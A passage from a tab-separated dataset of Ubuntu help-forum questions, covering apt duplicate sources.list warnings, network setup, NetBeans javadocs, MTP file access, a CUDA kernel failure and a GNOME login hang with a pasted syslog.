//archive.ubuntu.com/ubuntu/ raring/multiverse amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring/multiverse i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-updates/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-updates/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-updates_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-backports/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-backports/multiverse amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-backports/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-backports_restricted_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-backports/multiverse i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-backports_multiverse_binary-i386_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-security/restricted amd64 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-security_restricted_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.ubuntu.com/ubuntu/ raring-security/restricted i386 packages ( /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_raring-security_restricted_binary-i386_packages ) w : you may want to run apt-get update to correct these problems and here 's my /etc/apt/sources.list : # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.5 ) ] / quantal main restricted # deb cdrom : [ lubuntu 13.04 _raring ringtail_ - alpha amd64 ( 20130403 ) ] / raring main multiverse restricted universe # deb cdrom : [ ubuntu 13.04 _raring ringtail_ - release amd64 ( 20130420 ) ] / raring main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu raring main restricted deb-src http : //archive.ubuntu.com/ubuntu raring multiverse universe restricted main # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu raring-updates main restricted deb-src http : //archive.ubuntu.com/ubuntu raring-updates restricted universe main multiverse # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu raring-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu raring multiverse deb http : //archive.ubuntu.com/ubuntu raring-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu raring-backports main restricted universe multiverse deb-src http : //archive.ubuntu.com/ubuntu raring-backports universe restricted main multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu raring-security main restricted deb-src http : //archive.ubuntu.com/ubuntu raring-security restricted universe main multiverse # added by software-properties deb http : //archive.ubuntu.com/ubuntu raring-security universe deb http : //archive.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb http : //archive.ubuntu.com/ubuntu raring universe deb-src http : //extras.ubuntu.com/ubuntu raring main # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu raring partner deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # # # # # duplicate entry - removed # # # # # deb http : //archive.ubuntu.com/ubuntu raring universe # # added by seann 19 feb 2013 - minecraft map overviewer deb http : //overviewer.org/ debian ./ # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # # # # duplicate entry - removed # # # # # deb http : //archive.canonical.com/ubuntu raring partner # # # # # duplicate entry - removed # # # # # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party deb http : //archive.ubuntu.com/ubuntu raring multiverse restricted # # developers who want to ship their latest software . # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu raring restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu raring-updates restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu raring-backports restricted multiverse deb http : //archive.ubuntu.com/ubuntu raring-security restricted # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # # # # duplicate entry - removed # # # # # deb http : //archive.canonical.com/ubuntu raring partner # # # # # duplicate entry - removed # # # # # deb-src http : //archive.canonical.com/ubuntu raring partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //archive.ubuntu.com/ubuntu raring-proposed multiverse universe restricted main deb http : //download.learnfree.eu/repository/skss / # skss deb-src http : //download.learnfree.eu/repository/skss / # skss so ... thoughts , ideas , or suggestions ?
284756	new to ubuntu and got stuck on managing internet conection	just installed ubuntu 12.0.4 lts and got stuck on the part connecting to the internet . i ca n't even find a guide that can help me find the problem . maybe it 's because i 'm new and i just ca n't find the right way to do it , or ubuntu did n't install eth-drivers . i have a router that gives away automatically ip addresses .
284758	javadocs with netbeans 7.3 not showing help incode	i am running ubuntu 12.10 , i installed netbeans 7.3 full package and the javadocs are not found . i have tried to use the docs from online by going into java platform and adding the url but then they will not show at all . is this a netbeans problem or should i reinstall java jdk and then reinstall netbeans ? or is there a quick fix so it will show me the docs .
284760	how to see the indicators only for apps in current workspace ?	this worked fine in 11.10 , but today i upgraded to 12.10 and i ca n't remember what i had to do to get this to work correctly . what i want is : when in a workspace , the only icons in the taskbar should be for applications that are running in the current workspace . what i see now are all application icons regardless of the workspace they are running in . i am using gnome classic since i have a vpn client that only shows it 's status in the system tray from gnome classic .
284762	some ubuntu 13.04 applications can not access files on mtp-mounted systems . why ?	ubuntu 13.04 comes with mtp support to access files on newer android devices . my nexus 10 works ok : after plugging in , i can access the n10 files with nautilus , and i can copy from and to the device . evince will open pdf files right from the device , but some applications fail to open files directly from the device like gedit or libreoffice . gedit says something like : can not open file mtp : // [ usb:001,009 ] /65537/5823/5824 i guess mtp is integrated at the gvfs level , so should not all gvfs-enabled applications be able to access the mtp device ? why evince but not gedit ? i know that mtp could be mounted with fuse , but it would be nice if it worked with regular applications from nautilus just like sftp : // or smb : // .
284763	trouble with cuda 5.0 on a laptop	i am currently trying to run a program called mc-gpu v1.3 ( https : //code.google.com/p/mcgpu/ ) , on my laptop . first off , let me explain my situation . using a lenovo y400 laptop with nvidia 650m running ubuntu 12.10 installed cuda-5.0 , all samples compiled and i ran quite a few to test that they worked using proprietary driver , not dev-driver that came with cuda-5.0 wrote a quick `` hello world '' cuda program that compiled and ran i am compiled with the given lines in the code to create the mc-gpu_v1.3.x and run the simple geometry using ../mc-gpu_v1.3.x mc-gpu_v1.3_6voxels.in | tee mc-gpu_v1.3_6voxels.out i can compile and run the simple geometery code using the cpu compilation but the gpu part i can not get to work . i switch to console , disable the xserver by calling service lightdm stop and init 3 when i try to run the code after doing this , i get all print outs to the point of where it states : starting the monte carlo loop phase and then it tells me that i am executing 7813 blocks of 128 threads with 100 histories in each thread for a total of 100006400 histories in total . after this output , i get an error from line 891 in mc-gpu_v1.3.cu that ! ! kernel execution failed while simulating particle tracks ! ! : ( 4 ) unspecified launch failure . i am assuming that i am getting the error from where the code first tries to access the memory of the gpu , but unsure why i am getting these errors . since i am running a sample i am hoping that this is a simple problem of not compiling something correctly or missing a step in attempting the simulation . please let me know if anyone has time to help or if i should share any other information . can someone with a similar set up help me understand why this is n't working on my laptop and how i can get it to run ? i am willing to help someone to compile and run the program on their system if need be to speed things along if someone is willing to help me troubleshoot things . thank you , dave
284766	gnome 3.8 ( ubuntu gnome 13.04 ) wo n't start after boot . where to look for logs of this kind ?	until yesterday everything was going alright on ubuntu gnome 13.04 with gnome 3.8 from gnome3-team ppa . today i can not log in again . after booting , it hangs on the blue desktop from gdm and nothing happens . i have just reinstalled ubuntu gnome keeping my home folder and once again the problem persists . note that this time i did n't put any third parties ppas . where to begin looking for solutions in this problem ? /var/log/boot.log looks alright besides some kind of problem with 'saned ' being disabled . i found some errors in the syslog apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : bluetooth daemon 4.101 apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : starting sdp server apr 23 20:52:14 marc-linux modem-manager [ 957 ] : < info > modemmanager ( version 0.6.0.0 ) starting ... apr 23 20:52:14 marc-linux kernel : [ 13.070853 ] bluetooth : core ver 2.16 apr 23 20:52:14 marc-linux kernel : [ 13.070874 ] net : registered protocol family 31 apr 23 20:52:14 marc-linux kernel : [ 13.070876 ] bluetooth : hci device and connection manager initialized apr 23 20:52:14 marc-linux kernel : [ 13.070884 ] bluetooth : hci socket layer initialized apr 23 20:52:14 marc-linux kernel : [ 13.070886 ] bluetooth : l2cap socket layer initialized apr 23 20:52:14 marc-linux kernel : [ 13.070891 ] bluetooth : sco socket layer initialized apr 23 20:52:14 marc-linux kernel : [ 13.111811 ] bluetooth : rfcomm tty layer initialized apr 23 20:52:14 marc-linux kernel : [ 13.111823 ] bluetooth : rfcomm socket layer initialized apr 23 20:52:14 marc-linux kernel : [ 13.111825 ] bluetooth : rfcomm ver 1.11 apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : dis can not start : gatt is disabled apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : failed to init deviceinfo plugin apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : failed to init proximity plugin apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : failed to init time plugin apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : failed to init alert plugin apr 23 20:52:14 marc-linux bluetoothd [ 960 ] : failed to init thermometer plugin apr 23 20:52:14 marc-linux avahi-daemon [ 975 ] : found user 'avahi ' ( uid 110 ) and group 'avahi ' ( gid 116 ) . apr 23 20:52:14 marc-linux avahi-daemon [ 975 ] : successfully dropped root privileges . apr 23 20:52:14 marc-linux avahi-daemon [ 975 ] : avahi-daemon 0.6.31 starting up . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : successfully called chroot ( ) . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : successfully dropped remaining capabilities . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : loading service file /services/udisks.service . apr 23 20:52:15 marc-linux kernel : [ 13.231022 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 apr 23 20:52:15 marc-linux kernel : [ 13.231026 ] bluetooth : bnep filters : protocol multicast apr 23 20:52:15 marc-linux kernel : [ 13.231035 ] bluetooth : bnep socket layer initialized apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : network interface enumeration completed . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : registering hinfo record with values 'x86_64'/'linux ' . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : server startup complete . host name is marc-linux.local . local service cookie is 2532208128 . apr 23 20:52:15 marc-linux avahi-daemon [ 975 ] : service `` marc-linux '' ( /services/udisks.service ) successfully established . apr 23 20:52:15 marc-linux kernel : [ 13.301071 ] ppdev : user-space parallel port driver apr 23 20:52:15 marc-linux bluetoothd [ 960 ] : failed to init gatt_example plugin apr 23 20:52:15 marc-linux bluetoothd [ 960 ] : bluetooth management interface initialized apr 23 20:52:15 marc-linux kernel : [ 13.460244 ] type=1400 audit ( 1366761135.314:8 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=998 comm= '' apparmor_parser '' apr 23 20:52:15 marc-linux kernel : [ 13.460711 ] type=1400 audit ( 1366761135.314:9 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/sbin/cupsd '' pid=998 comm= '' apparmor_parser '' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'anydata' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'gobi' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'wavecom' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'linktop' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'novatel' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'ericsson mbm' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'option' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'simtech' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'motoc' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'longcheer' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'nokia' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'option high-speed' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'huawei' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'x22x' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'zte' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'samsung' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'sierra' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'iridium' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'cinterion' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > loaded plugin 'generic' apr 23 20:52:15 marc-linux modem-manager [ 957 ] : < info > successfully loaded 20 plugins apr 23 20:52:15 marc-linux networkmanager [ 1002 ] : < info > networkmanager ( version 0.9.8.0 ) is starting ... apr 23 20:52:15 marc-linux networkmanager [ 1002 ] : < info > read config file /etc/networkmanager/networkmanager.conf apr 23 20:52:15 marc-linux networkmanager [ 1002 ] : < info > wext support is enabled apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > dns : loaded plugin dnsmasq apr 23 20:52:16 marc-linux dbus [ 946 ] : [ system ] activating service name='org.freedesktop.policykit1 ' ( using servicehelper ) apr 23 20:52:16 marc-linux polkitd [ 1007 ] : started daemon version 0.105 using authority implementation `local ' version `0.105' apr 23 20:52:16 marc-linux dbus [ 946 ] : [ system ] successfully activated service 'org.freedesktop.policykit1' apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : init ! apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : update_system_hostname apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scpluginifupdown : management mode : unmanaged apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:07.0/net/eth0 , iface : eth0 ) apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:07.0/net/eth0 , iface : eth0 ) : no ifupdown configuration found . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : end _init . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : ifupdown : get unmanaged devices count : 0 apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : ( 15700144 ) ... get_connections . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : scplugin-ifupdown : ( 15700144 ) ... get_connections ( managed=false ) : return empty list . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : ifupdown : get unmanaged devices count : 0 apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > modem-manager is now available apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > wifi hardware radio set enabled apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > wifi enabled by radio killswitch ; enabled by state file apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > wwan enabled by radio killswitch ; enabled by state file apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > wimax enabled by radio killswitch ; enabled by state file apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > networking is enabled by state file apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : carrier is off apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : new ethernet device ( driver : 'forcedeth ' ifindex : 2 ) apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/0 apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : bringing up device . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : preparing device . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] apr 23 20:52:16 marc-linux kernel : [ 14.588355 ] forcedeth 0000:00:07.0 : irq 43 for msi/msi-x apr 23 20:52:16 marc-linux kernel : [ 14.588386 ] forcedeth 0000:00:07.0 eth0 : msi enabled apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > added default wired connection 'wired connection 1 ' for /sys/devices/pci0000:00/0000:00:07.0/net/eth0 apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < warn > /sys/devices/virtual/net/lo : could n't determine device driver ; ignoring ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > auto-activating connection 'wired connection 1 ' . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) starting connection 'wired connection 1' apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) scheduled . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) complete . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) started ... apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > dhclient started with pid 1013 apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) beginning ip6 addrconf . apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > activation ( eth0 ) stage 3 of 5 ( ip configure start ) complete . apr 23 20:52:16 marc-linux dhclient : internet systems consortium dhcp client 4.2.4 apr 23 20:52:16 marc-linux dhclient : copyright 2004-2012 internet systems consortium . apr 23 20:52:16 marc-linux dhclient : all rights reserved . apr 23 20:52:16 marc-linux dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 23 20:52:16 marc-linux dhclient : apr 23 20:52:16 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : dhcpv4 state changed nbi - > preinit apr 23 20:52:16 marc-linux dhclient : listening on lpf/eth0/00:26:2d:35 : b9:04 apr 23 20:52:16 marc-linux dhclient : sending on lpf/eth0/00:26:2d:35 : b9:04 apr 23 20:52:16 marc-linux dhclient : sending on socket/fallback apr 23 20:52:16 marc-linux dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 ( xid=0xfc93b5d ) apr 23 20:52:17 marc-linux kernel : [ 15.366752 ] type=1400 audit ( 1366761137.222:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1037 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.367185 ] type=1400 audit ( 1366761137.222:11 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=1037 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.367439 ] type=1400 audit ( 1366761137.222:12 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=1037 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.389737 ] type=1400 audit ( 1366761137.246:13 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=1040 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.390275 ] type=1400 audit ( 1366761137.246:14 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=1040 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.391104 ] type=1400 audit ( 1366761137.246:15 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-*//sanitized_helper '' pid=1040 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.394550 ] type=1400 audit ( 1366761137.250:16 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=1041 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux kernel : [ 15.395051 ] type=1400 audit ( 1366761137.250:17 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=1041 comm= '' apparmor_parser '' apr 23 20:52:17 marc-linux anacron [ 1095 ] : anacron 2.3 started on 2013-04-23 apr 23 20:52:17 marc-linux acpid : starting up with proc fs apr 23 20:52:17 marc-linux cron [ 1078 ] : ( cron ) info ( pidfile fd = 3 ) apr 23 20:52:17 marc-linux anacron [ 1095 ] : will run job `cron.daily ' in 5 min . apr 23 20:52:17 marc-linux anacron [ 1095 ] : will run job `cron.weekly ' in 10 min . apr 23 20:52:17 marc-linux anacron [ 1095 ] : will run job `cron.monthly ' in 15 min . apr 23 20:52:17 marc-linux anacron [ 1095 ] : jobs will be executed sequentially apr 23 20:52:17 marc-linux cron [ 1114 ] : ( cron ) startup ( fork ok ) apr 23 20:52:17 marc-linux cron [ 1114 ] : ( cron ) info ( running @ reboot jobs ) apr 23 20:52:18 marc-linux avahi-daemon [ 975 ] : joining mdns multicast group on interface eth0.ipv6 with address fe80 : :226:2dff : fe35 : b904 . apr 23 20:52:18 marc-linux avahi-daemon [ 975 ] : new relevant interface eth0.ipv6 for mdns . apr 23 20:52:18 marc-linux avahi-daemon [ 975 ] : registering new address record for fe80 : :226:2dff : fe35 : b904 on eth0.* . apr 23 20:52:18 marc-linux acpid : 33 rules loaded apr 23 20:52:18 marc-linux acpid : waiting for events : event logging is off apr 23 20:52:18 marc-linux acpid : client connected from 1265 [ 0:0 ] apr 23 20:52:18 marc-linux acpid : 1 client rule loaded apr 23 20:52:19 marc-linux dhclient : dhcprequest of 192.168.25.7 on eth0 to 255.255.255.255 port 67 ( xid=0xfc93b5d ) apr 23 20:52:19 marc-linux dhclient : dhcpoffer of 192.168.25.7 from 192.168.25.1 apr 23 20:52:19 marc-linux dhclient : dhcpack of 192.168.25.7 from 192.168.25.1 apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > ( eth0 ) : dhcpv4 state changed preinit - > bound apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > address 192.168.25.7 apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > prefix 24 ( 255.255.255.0 ) apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > gateway 192.168.25.1 apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > hostname 'marc-linux' apr 23 20:52:19 marc-linux networkmanager [ 1002 ] : < info > nameserver '192.168.25.1' apr 23 